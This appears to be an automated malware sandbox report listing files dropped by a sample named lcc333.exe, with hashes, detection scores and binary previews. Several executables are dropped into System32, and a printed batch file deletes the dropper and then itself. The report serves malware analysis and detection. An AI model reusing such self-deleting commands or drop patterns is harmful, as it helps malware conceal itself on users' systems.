                                                                                                                                                        SHA-512:55BFD1A848F2A70A7A55626FB84086689F867A79F09726C825522D8530F4E83708EB7CAA7F7869155D3AE48F3B6AA583B556F3971A2F3412626AE76680E83CA1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d...`b.f.........." ...(.....8............................................................`..........................................C..L...<D..d....p.......`.......P.../...........4..T...........................@3..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\_socket.pyd

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):83736
                                                                                                                                                        Entropy (8bit):6.3186936632343205
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:mOYhekrkJqlerLSyypHf9/s+S+pzMii/n1IsJqKN5IMLwoR7SygCxkWN:vwkJqHyypHf9/sT+pzMiE1IwdN5IMLw0
                                                                                                                                                        MD5:69801D1A0809C52DB984602CA2653541
                                                                                                                                                        SHA1:0F6E77086F049A7C12880829DE051DCBE3D66764
                                                                                                                                                        SHA-256:67ACA001D36F2FCE6D88DBF46863F60C0B291395B6777C22B642198F98184BA3
                                                                                                                                                        SHA-512:5FCE77DD567C046FEB5A13BAF55FDD8112798818D852DFECC752DAC87680CE0B89EDFBFBDAB32404CF471B70453A33F33488D3104CD82F4E0B94290E83EAE7BB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c|.Nb}g.a|.Nb}g.f|.Nb}g.g|.Nb}..c|.Nb}.Nc}.Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}................PE..d....b.f.........." ...(.x..........0-.......................................`............`.........................................@...P............@.......0.........../...P......P...T...............................@............................................text....v.......x.................. ..`.rdata...x.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\_ssl.pyd

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):178456
                                                                                                                                                        Entropy (8bit):5.975111032322451
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:9EkiCZfBmvD1ZLnM2YfW6XSvWJLX2GvMf1ba+VRJNI7IM/H9o/PCrXuI3JVIMC7g:riC5QD1dwW6XSOMfjTwJH
                                                                                                                                                        MD5:90F080C53A2B7E23A5EFD5FD3806F352
                                                                                                                                                        SHA1:E3B339533BC906688B4D885BDC29626FBB9DF2FE
                                                                                                                                                        SHA-256:FA5E6FE9545F83704F78316E27446A0026FBEBB9C0C3C63FAED73A12D89784D4
                                                                                                                                                        SHA-512:4B9B8899052C1E34675985088D39FE7C95BFD1BBCE6FD5CBAC8B1E61EDA2FBB253EEF21F8A5362EA624E8B1696F1E46C366835025AABCB7AA66C1E6709AAB58A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|..j8.98.98.91.09>.9._.8:.9._.8;.9._.80.9._.85.9-X.8>.98.9..9s..8?.9-X.8:.9-X.89.9-X\99.9-X.89.9Rich8.9........................PE..d....b.f.........." ...(.............,....................................................`.............................................d...D...................P......../......x.......T...........................@...@............................................text............................... ..`.rdata...#.......$..................@..@.data...p...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\base_library.zip

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1332808
                                                                                                                                                        Entropy (8bit):5.586996633599356
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:rclJGUq/aLmn9vc+fYNXPh26UZWAzbX7jg/yquPxGhpdmFPpH71dAt/RO2/HU3:rclJGUza9zb/gXOOpdmFPNLAg2/HU3
                                                                                                                                                        MD5:FE165DF1DB950B64688A2E617B4ACA88
                                                                                                                                                        SHA1:71CAE64D1EDD9931EF75E8EF28E812E518B14DDE
                                                                                                                                                        SHA-256:071241AC0FD6E733147A71625DE5EAD3D7702E73F8D1CBEBF3D772CBDCE0BE35
                                                                                                                                                        SHA-512:E492A6278676EF944363149A503C7FADE9D229BDDCE7AFA919F5E72138F49557619B0BDBA68F523FFFE7FBCA2CCFD5E3269355FEBAF01F4830C1A4CC67D2E513
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK..........!.LX. S...S......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\certifi\cacert.pem

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:ASCII text
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):299427
                                                                                                                                                        Entropy (8bit):6.047872935262006
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                        MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                        SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                        SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                        SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer\md.cp312-win_amd64.pyd

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):10752
                                                                                                                                                        Entropy (8bit):4.674392865869017
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:KGUmje72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFXiHBpv9cX6gTim1qeSC:rjQ2HzzU2bRYoe1HH9cqgTimoe
                                                                                                                                                        MD5:D9E0217A89D9B9D1D778F7E197E0C191
                                                                                                                                                        SHA1:EC692661FCC0B89E0C3BDE1773A6168D285B4F0D
                                                                                                                                                        SHA-256:ECF12E2C0A00C0ED4E2343EA956D78EED55E5A36BA49773633B2DFE7B04335C0
                                                                                                                                                        SHA-512:3B788AC88C1F2D682C1721C61D223A529697C7E43280686B914467B3B39E7D6DEBAFF4C0E2F42E9DDDB28B522F37CB5A3011E91C66D911609C63509F9228133D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d....jAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\charset_normalizer\md__mypyc.cp312-win_amd64.pyd

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):122880
                                                                                                                                                        Entropy (8bit):5.917175475547778
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:bA3W6Fck6/g5DzNa4cMy/dzpd1dhdMdJGFEr6/vD:MW6NzcMy/d13FErgvD
                                                                                                                                                        MD5:BF9A9DA1CF3C98346002648C3EAE6DCF
                                                                                                                                                        SHA1:DB16C09FDC1722631A7A9C465BFE173D94EB5D8B
                                                                                                                                                        SHA-256:4107B1D6F11D842074A9F21323290BBE97E8EED4AA778FBC348EE09CC4FA4637
                                                                                                                                                        SHA-512:7371407D12E632FC8FB031393838D36E6A1FE1E978CED36FF750D84E183CDE6DD20F75074F4597742C9F8D6F87AF12794C589D596A81B920C6C62EE2BA2E5654
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d....jAe.........." ...%.:...........<.......................................0............`.........................................@...d.......................(............ ......P...................................@............P...............................text....8.......:.................. ..`.rdata...W...P...X...>..............@..@.data...8=.......0..................@....pdata..(...........................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\libcrypto-3.dll

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5232408
                                                                                                                                                        Entropy (8bit):5.940072183736028
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:98304:/V+Qs2NuR5YV0L8PQ1CPwDvt3uFlDC4SC9c:9rs2NuDYV0L841CPwDvt3uFlDC4SCa
                                                                                                                                                        MD5:123AD0908C76CCBA4789C084F7A6B8D0
                                                                                                                                                        SHA1:86DE58289C8200ED8C1FC51D5F00E38E32C1AAD5
                                                                                                                                                        SHA-256:4E5D5D20D6D31E72AB341C81E97B89E514326C4C861B48638243BDF0918CFA43
                                                                                                                                                        SHA-512:80FAE0533BA9A2F5FA7806E86F0DB8B6AAB32620DDE33B70A3596938B529F3822856DE75BDDB1B06721F8556EC139D784BC0BB9C8DA0D391DF2C20A80D33CB04
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(..7..<......v........................................0P.......O...`...........................................H.0.....O.@....@O.|.... L. .....O../...PO.$...`{D.8............................yD.@.............O..............................text.....7.......7................. ..`.rdata........7.......7.............@..@.data...Ao....K..<....K.............@....pdata....... L.......K.............@..@.idata...%....O..&....N.............@..@.00cfg..u....0O.......N.............@..@.rsrc...|....@O.......N.............@..@.reloc..~....PO.......N.............@..B................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\libssl-3.dll

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):792856
                                                                                                                                                        Entropy (8bit):5.57949182561317
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:7LN1sdyIzHHZp5c3nlUa6lxzAG11rbmFe9Xbv:7LgfzH5I3nlUa2AU2Fe9Xbv
                                                                                                                                                        MD5:4FF168AAA6A1D68E7957175C8513F3A2
                                                                                                                                                        SHA1:782F886709FEBC8C7CEBCEC4D92C66C4D5DBCF57
                                                                                                                                                        SHA-256:2E4D35B681A172D3298CAF7DC670451BE7A8BA27C26446EFC67470742497A950
                                                                                                                                                        SHA-512:C372B759B8C7817F2CBB78ECCC5A42FA80BDD8D549965BD925A97C3EEBDCE0335FBFEC3995430064DEAD0F4DB68EBB0134EB686A0BE195630C49F84B468113E3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.>..........K........................................0......!+....`..........................................x...Q..............s.... ...M......./......d...p...8...............................@............................................text....<.......>.................. ..`.rdata..hz...P...|...B..............@..@.data...qN.......H..................@....pdata..pV... ...X..................@..@.idata...c.......d...^..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..C...........................@..B........................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\python312.dll

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6927640
                                                                                                                                                        Entropy (8bit):5.765552513907485
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:49152:mRSn173WIgXqQYRn0I+gaYFD0iRpIrCMEGXgeieBwHTuJTA8LbLH7ft4OCLj8j4V:mIn8hYEgw8Ij887GlSvBHDMiEruuln
                                                                                                                                                        MD5:166CC2F997CBA5FC011820E6B46E8EA7
                                                                                                                                                        SHA1:D6179213AFEA084F02566EA190202C752286CA1F
                                                                                                                                                        SHA-256:C045B57348C21F5F810BAE60654AE39490846B487378E917595F1F95438F9546
                                                                                                                                                        SHA-512:49D9D4DF3D7EF5737E947A56E48505A2212E05FDBCD7B83D689639728639B7FD3BE39506D7CFCB7563576EBEE879FD305370FDB203909ED9B522B894DD87AACB
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d...=b.f.........." ...(..(..4B..... .........................................j......[j...`..........................................cN.d...$1O.......i......._.xI....i../... i.([....2.T.....................H.(...p.2.@............ (..............................text.....(.......(................. ..`.rdata...6'.. (..8'...(.............@..@.data....I...`O......HO.............@....pdata..xI...._..J....^.............@..@PyRuntim0.....b.......a.............@....rsrc.........i...... h.............@..@.reloc..([... i..\...*h.............@..B........................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\select.pyd

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):31000
                                                                                                                                                        Entropy (8bit):6.556986708902353
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:IyRVBC9t6Lhz64CHf2slDT90Y5IMQGCHQIYiSy1pCQFm/AM+o/8E9VF0Ny/r5n+/:LGyKHfx1H5IMQGY5YiSyv4AMxkEFNnq
                                                                                                                                                        MD5:7C14C7BC02E47D5C8158383CB7E14124
                                                                                                                                                        SHA1:5EE9E5968E7B5CE9E4C53A303DAC9FC8FAF98DF3
                                                                                                                                                        SHA-256:00BD8BB6DEC8C291EC14C8DDFB2209D85F96DB02C7A3C39903803384FF3A65E5
                                                                                                                                                        SHA-512:AF70CBDD882B923013CB47545633B1147CE45C547B8202D7555043CFA77C1DEEE8A51A2BC5F93DB4E3B9CBF7818F625CA8E3B367BFFC534E26D35F475351A77C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d...`b.f.........." ...(.....2.......................................................o....`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\_MEI6122\unicodedata.pyd

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1138456
                                                                                                                                                        Entropy (8bit):5.4620027688967845
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:arEHdcM6hbuCjJ43w9hIpCQvb0QN8MdIEQ+U2BNNmD+99FfcAIU:arEXDCjfk7bPNfv42BN6yzUAIU
                                                                                                                                                        MD5:A8ED52A66731E78B89D3C6C6889C485D
                                                                                                                                                        SHA1:781E5275695ACE4A5C3AD4F2874B5E375B521638
                                                                                                                                                        SHA-256:BF669344D1B1C607D10304BE47D2A2FB572E043109181E2C5C1038485AF0C3D7
                                                                                                                                                        SHA-512:1C131911F120A4287EBF596C52DE047309E3BE6D99BC18555BD309A27E057CC895A018376AA134DF1DC13569F47C97C1A6E8872ACEDFA06930BBF2B175AF9017
                                                                                                                                                        Malicious:false
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#.}.#.}.#.}.*..%.}..*|.!.}..*~. .}..*y.+.}..*x...}.6-|. .}.h.|.!.}.#.|.s.}.6-p.".}.6-}.".}.6-..".}.6-..".}.Rich#.}.........PE..d...`b.f.........." ...(.@..........0*.......................................p.......)....`.........................................p...X............P.......@.......0.../...`......P^..T............................]..@............P..p............................text...!>.......@.................. ..`.rdata..\....P.......D..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P.......$..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Users\user\Desktop\lcc333.bat

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):79
                                                                                                                                                        Entropy (8bit):4.750248394339121
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3:mKDDCMN2RqhOUWJRWJGGWObBkcVS:hWK2HNJAIGVbKkS
                                                                                                                                                        MD5:B0A1EBC006E80E8C857D05467731C16C
                                                                                                                                                        SHA1:656B28AF24B97CA38A0C497F8B8E6D38577B314F
                                                                                                                                                        SHA-256:3AB4ABC631C51FE064F12117B0D58DA7108B4F41B618E2408BA9A75CEFFC71D9
                                                                                                                                                        SHA-512:F43E5C9D021DFD432DCD84331FEAEA43CDC51A0BC01EE92F876E96F0C6C152ED41CA22BBF210B7BB6AF797FAD1A5CA63187FF753F9952E7E61BAA33C65FEBCB4
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:@echo off..timeout /t 5..del "C:\Users\user\Desktop\lcc333.exe"..del "%~f0"..

                                                                                                                                                        C:\Users\user\Desktop\windows2.zip

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):22077297
                                                                                                                                                        Entropy (8bit):7.999395251356258
                                                                                                                                                        Encrypted:true
                                                                                                                                                        SSDEEP:393216:duZO0FKS4Kk6xL+IhROEBWbzQfuDWUo26mybPQg4WmmIR1q6S3p1oyR6E6slwd6B:v0H4N6N+QOZzQ2DHCrQg4WBGkXFlwd6B
                                                                                                                                                        MD5:3CAF7E3D5E3AA6EC2E50E51025B5DAA2
                                                                                                                                                        SHA1:51A0572CBF67D0A503278423F646342D1662A5F9
                                                                                                                                                        SHA-256:08E791255D066C2513F8A53FA27FC367CAE8A663BDCA07EC667E2848A255AD9B
                                                                                                                                                        SHA-512:3DAF383C4DDAB792700DFD41DDE686FA63536C61EAC34E5398A200C25F22B4F86691234E0639D20A86CA2D820C98E0246273370D2FE8DC08EBAB54183C18DAA2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........HqYa..............python.batU....0.Ew...K.7Dps ..&...0.A[l.bi...b.\oN.{F....(.)cF.L..."-.........w.`.\...0.}'...5.c...J*.l.+.GQ.4?...Y^X.e.F.............el').R......./.I..Qp7.....PK.........%nYiX.bs.....\.....app_process.exe...|SU.8.....ZN*.Ey...*`...M..R(.@Q..X..H.D:.PHRz.......p.a...... B.->..PF-.zb|.PhA.o......w..............k.]|.rA'.......B.@.l.?........G....F....S*.g..;....|....7.m....\.}.{.3;&.d..Yw....e.u..C.=.Q.........S....K.....w...%w....;..K...\s.[..........<.~o....HS.ZR$..j........B...O.p.!.o..i..-...M.F..Y+.).....3i..?.P.X.H.9.=.Q........M..MHX>S.u3..Ra`.s_...m@)...H(I;..#.wU..o.....].\.,.e#...}. l..?.)\.~.....m$.......X.....7w/.4...|TCc].~.{...k..;..;.0..^:.{........o....,.&.%.~.C.....)p.I.?*..G...+...Y#.P..g....."....`?......d.>....H..&..|.....H...?;.W$.i.....$6L.....W.J.....a.....P.H~......A.&r.....d../c.6V...CN.+.....V.7.R......L.1.6....&.l.........{s.+.9...?...0n.?.<...k...N.v....I~O...7[%.fA.=..I.qVW`~.+.

                                                                                                                                                        C:\Windows\System32\AutoDesk.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):21075456
                                                                                                                                                        Entropy (8bit):7.829861015365243
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:393216:qpVCpUZDaws+mjNO9i7Goq2aEwVrC0AqmYT9lL9VnTVQj:qpVMUdawYNOY7XwRC0AqtT9lJVTVQ
                                                                                                                                                        MD5:684CBE7FDADD9BE38FBFE427040B2637
                                                                                                                                                        SHA1:8BB3800B269FDCD0B3F0ED1CEDE561F623B39D83
                                                                                                                                                        SHA-256:7086CA50F3973B207786C2C1079FCBD2A6A2A531AF2772FD7893A300DD479E0F
                                                                                                                                                        SHA-512:FF302DAF47D795A6BB630C0BE6F0059906CCF33AD4D7CD49EB158BC5C13598541543C94F9CAB585A772DEBCBAD53DDD091772A9A0076B88B18A9C9ABE5BEF216
                                                                                                                                                        Malicious:true
                                                                                                                                                        Antivirus:
                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......g.........."....%......"................@..........................................`.........................................8.......P...................................................................(.......@............0...............................text...k........................... ..`.rdata.. ...........................@..@.data...............................@....pdata..@...........................@..@__nv_mod............................@...__nv_rel.?6.........................@..@.nvFatBix.....Q.....................@..@.nv_fatb.....Q.....................@..@.`[w.....Z....5..................... ..`.[dL.....-...0......................@....|q6....`^A..`...`A..2..............`..h.rsrc.................A.............@..@.reloc................A.............@..B........................................................................................

                                                                                                                                                        C:\Windows\System32\app_process.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6063616
                                                                                                                                                        Entropy (8bit):6.536463231938141
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:98304:tel0MlllPjYjkI009qjZHnYjD7y0t3hst3e5++:Al0Mh0sYjPy0Tg
                                                                                                                                                        MD5:7226BE407EFCC671016739CAD3D26220
                                                                                                                                                        SHA1:2894A803178A95409BF5227B81EE113198BBEA70
                                                                                                                                                        SHA-256:91F900264FB9E3EC53778DE6FE76D0CEA56176F4C2DB2D1130837A4CCD06E084
                                                                                                                                                        SHA-512:A7E0B08FD134FFF02536CEBF52CAD223B55DB36912D581D247B699FA35D417D2C6322428E58B3F79CFC2065569204CCB8730FA19C584BC86C572E4F5D018F1D9
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........1..b..b..b...b..b.Z.c..b.Z.c..b.Z.c..b.Z.c..b..b..b.[.c..b..b..b.[.c..bRich..b........PE..d.....5g.........."....)..D.........|.C........@.............................._...........`.................................................4.Z...............^..............._.dZ....X.......................X.(.....X.@.............E.P............................text.....D.......D................. ..`.rdata...4....E..6....D.............@..@.data........@Z..|....Z.............@....pdata........^.......Z.............@..@.reloc..dZ...._..\...*\.............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                        C:\Windows\System32\nircmd.exe

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Users\user\Desktop\lcc333.exe
                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):119808
                                                                                                                                                        Entropy (8bit):6.207959191525698
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:oG0tOQJC9TPafQy26RAA3hh5Tgr559MJZpOSDUDyjHHKHlLz1Ms/b:2OQJC9uICA11l1MYb
                                                                                                                                                        MD5:4A9DA765FD91E80DECFD2C9FE221E842
                                                                                                                                                        SHA1:6F763FBD2B37B2CE76A8E874B05A8075F48D1171
                                                                                                                                                        SHA-256:2E81E048AB419FDC6E5F4336A951BD282ED6B740048DC38D7673678EE3490CDA
